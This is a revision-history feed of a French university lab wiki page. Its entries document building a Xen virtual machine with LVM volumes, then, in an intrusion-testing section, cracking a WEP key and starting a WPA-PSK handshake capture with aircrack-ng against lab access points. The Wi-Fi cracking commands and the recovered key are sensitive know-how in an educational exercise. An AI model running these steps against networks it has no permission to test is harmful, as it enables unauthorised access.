Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 7&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, les VI générés par le point d'accès sont capturé pour obtenir une &amp;quot;handshake&amp;quot; dans un fichier psk grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 7 --bssid 44:AD:D9:5F:87:0A -w psk wlan0mon&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56307</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56307"/>
				<updated>2021-10-25T16:53:48Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* 5.3  Cassage de mot de passe WPA-PSK par force brute */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 7&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, les VI générés par le point d'accès sont capturé pour obtenir une Handshake dans un fichier psk grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 7 --bssid 44:AD:D9:5F:87:0A -w psk wlan0mon&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56301</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56301"/>
				<updated>2021-10-25T16:43:27Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 7&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56300</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56300"/>
				<updated>2021-10-25T16:38:43Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Tests d'intrusions */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56262</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56262"/>
				<updated>2021-10-25T15:17:14Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Création de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
